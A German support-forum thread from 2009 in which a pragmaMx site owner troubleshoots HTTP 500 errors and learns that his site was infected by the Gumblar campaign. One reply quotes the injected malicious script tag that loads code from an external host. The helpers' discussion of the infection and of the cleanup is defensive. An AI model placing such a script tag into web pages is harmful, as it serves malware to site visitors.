pragmaMx Support Forum

alles für Webmaster => Webserver & Server@Home => Thema gestartet von: team-rsr am 15 Oktober 2009, 23:46:36

Titel: HTTP Interner Serverfehler
Beitrag von: team-rsr am 15 Oktober 2009, 23:46:36
Hallo,

Hab mal wieder ein neues Problem,

wenn ich meine Seite aufrufe kommt dieser fehler.

http://www.team-rsr.com/portal/index.php

habe aber den Quelltext da.

was kann da los sein, habe schon in der Suche diesen Fehler eingegeben und die Chmod angesehen aber die passen.

MFG
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 15 Oktober 2009, 23:49:54
jetzt gehts wieder  :puzzled:

mfg
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: bajazzo am 17 Oktober 2009, 16:48:21
bist du sicher? ich sehe nächmlich nur eine weise seite ???
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 17 Oktober 2009, 21:52:58
ja ich auch, jetzt geht sie wieder nicht.

was ist das ???
Titel: Re: HTTP Interner Serverfehler
Beitrag von: pekobe am 17 Oktober 2009, 22:43:46
Hallo,

ohne Quellcode und Fehlermeldung ist Dir schwer zu helfen.


LG Sven
Titel: Re: HTTP Interner Serverfehler
Beitrag von: JoergK am 17 Oktober 2009, 22:57:07
Hoi ;)

Die Seite bzw. der Server gibt einen "Error 500 - Interner Serverfehler" zurück.
Das  kann vielerlei Ursachen haben. Ein Blick in die Logdateien des Servers bringt meist Klarheit.
Alles andere wäre stochern im Nebel, derweil z.B.:

- Falsche Dateirechte
- Befehle in einer .htaccess-Datei, die trotz Allow-Overwrite nicht ausgeführt werden dürfen/können

mögliche Ursachen sein können. Eventuell hilft auch ein Gespräch/Geschreibsel mit dem Provider, der vielleicht was an den Einstellungen geändert hat.
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 18 Oktober 2009, 17:06:57
hallo,

wo bekomme ich die Log Datein her?

Bei servermeldungen kommt das

Wiederherstellung von mail wurde erfolgreich beendet 10/15/09 - 23:47:23
Wiederherstellung von files wurde erfolgreich beendet 10/15/09 - 23:47:22
Wiederherstellung von html wurde erfolgreich beendet 10/15/09 - 23:47:22
Wiederherstellung von mysql wurde erfolgreich beendet 10/15/09 - 23:45:16
Wiederherstellung von mail wurde erfolgreich beendet 10/14/09 - 22:51:21
Wiederherstellung von files wurde erfolgreich beendet 10/14/09 - 22:51:19
Wiederherstellung von html wurde erfolgreich beendet 10/14/09 - 22:51:19
Wiederherstellung von mysql wurde erfolgreich beendet 10/14/09 - 22:49:02
Wiederherstellung von mail wurde erfolgreich beendet 10/12/09 - 01:09:26
Wiederherstellung von files wurde erfolgreich beendet


mfg
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 18 Oktober 2009, 23:09:48
kann mir wer auskunft geben  :puzzled:

mfg
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: FrankP am 19 Oktober 2009, 02:33:10
Zitatkann mir wer auskunft geben
Am besten dein Provider.

Ansonsten die Suche hier nach "weiße Seite" z.B. das hier http://www.pragmamx.org/Forum-topic-29331-start-msg188214.html#msg188214
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 19 Oktober 2009, 22:07:38
Hallo,

Ich habe ja keine Weisse seite, das problem hatte ich schon mal aber dieses mal ist ja ein Interner Serverfehler HTTP500

Ich weiss überhaupt nicht was ich jetzt machen soll, bin koplett überfordert.

mfg
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: martin b am 19 Oktober 2009, 23:03:22
Hallo Bert

Wende dich an deinen Provider. Das wurde schon einige male geschrieben.

Gruß
martin b
Titel: Re: HTTP Interner Serverfehler
Beitrag von: FrankP am 19 Oktober 2009, 23:16:07
Im FF sehe ich eine weiße Seite, im IE den Fehler 500. Zu beidem spuckt die Suche hier Informationen in Hülle und Fülle aus.

ZitatIch weiss überhaupt nicht was ich jetzt machen soll, bin koplett überfordert.

Anwort: Lesen, was man dir geantwortet hat und es befolgen.
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 20 Oktober 2009, 23:36:27
Habe meinen provider geschrieben das diese Fehlermeldung kommt und habe ihm den Link gesendet und da kam das retour:


Hallo,

wir können keinen fehler feststellen.

Was soll man dazu noch sagen.

mfg
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: SvenW am 22 Oktober 2009, 00:19:46
Zitat von: FrankP am 19 Oktober 2009, 02:33:10

Ansonsten die Suche hier nach "weiße Seite" z.B. das hier http://www.pragmamx.org/Forum-topic-29331-start-msg188214.html#msg188214

Probiert?

Hast du modrewrite bei dir genutzt?

Wenn ja, hast du deine ".htaccess" mal rausgenommen?
Titel: Re: HTTP Interner Serverfehler
Beitrag von: Baldyman am 22 Oktober 2009, 07:14:18
Moin zusammen  :morning:

wenn ich auf deine Seite gehe http://www.team-rsr.com springt bei mir sofort der Kaspersky an
und meckert wegen dem hier   trojan-downloader.js.gumblar.x

:gruebel:
Titel: Re: HTTP Interner Serverfehler
Beitrag von: SvenW am 22 Oktober 2009, 09:36:35
Zitat von: Baldyman am 22 Oktober 2009, 07:14:18
:gruebel:


<script src=http://mikyaku.jp/mikyaku1/order.php ></script>
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 22 Oktober 2009, 23:18:06
Hallo,

Anscheinend wurde mein Portal zu 2 mal gehäckt. würde ja zu gern emal wisse wie das zu stande kommt den dieses mal habe ich
nix offen gelassen und auch keine optionen zum raufladen von irgenwelchen daten.
Für mich ist das Portal nix den ds ist mir zu viel zeit die ich investire.

Werde es einfach löschen und vergbessen.

mfg
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: SvenW am 25 Oktober 2009, 09:24:32
Zitat von: team-rsr am 22 Oktober 2009, 23:18:06
...würde ja zu gern emal wisse wie das zu stande kommt...



http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/

http://diepresse.com/home/techscience/internet/sicherheit/483140/index.do
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 27 Oktober 2009, 17:19:31
Hallo,

was kann man in meinem Fall machen.
Habe mal die gesamte HP runtergezogen vom server wo noch alles ging, habe auch mit MYSql Dumper ne sicherun gemacht
wo noch alles ging.
Wie wäre jetzt die vorgehensweise das alles wieder richtig hochzuladen.

mfg
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: FrankP am 27 Oktober 2009, 17:30:38
ZitatAnscheinend wurde mein Portal zu 2 mal gehäckt
ZitatWie wäre jetzt die vorgehensweise das alles wieder richtig hochzuladen.

Eben nicht "alles" wieder hochladen.

Zuerst sämtlichen Schadcode entfernen und unbedingt klären, wie dieser auf deine Website gekommen ist. Hierzu sind sowohl alle Logfiles zu untersuchen und die von Sven genannten Links aufmerksam zu lesen und die Hinweise dort zu befolgen, als auch selbständig zu recherchieren, was und vor allem wie der Schadcode auf deine Website gekommen ist. Lt. den Hinweisen steht zu befürchten, dass deine Workstation kompromittiert ist. Solange du das nicht im Griff hast, wirst du vermutlich sehr schnell wieder mit weiterem Schadcode zu tun haben.
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 27 Oktober 2009, 18:00:18
Hallo,

Wo finde ich die Logfiles?
Die Daten die ich habe müsste ja in Ordnung sein oder ??? wurden ja runtergeladen und gesichert wo noch alles passte.

MFG
Bert
Titel: Re: HTTP Interner Serverfehler
Beitrag von: FrankP am 27 Oktober 2009, 18:20:36
ZitatWo finde ich die Logfiles?
Das kann dir dein Provider sagen

Zitatgesichert wo noch alles passte.
Sicher? Und wie kam der Schadcode auf dein Web?
Titel: Re: HTTP Interner Serverfehler
Beitrag von: team-rsr am 27 Oktober 2009, 22:23:43
Kann ich die Datein was gesichert wurden anschauen ob die passen??

Ja wie kann man dan so ein Portal sichern, so das man sich sicher sein kann das es passt??


MFG
Bert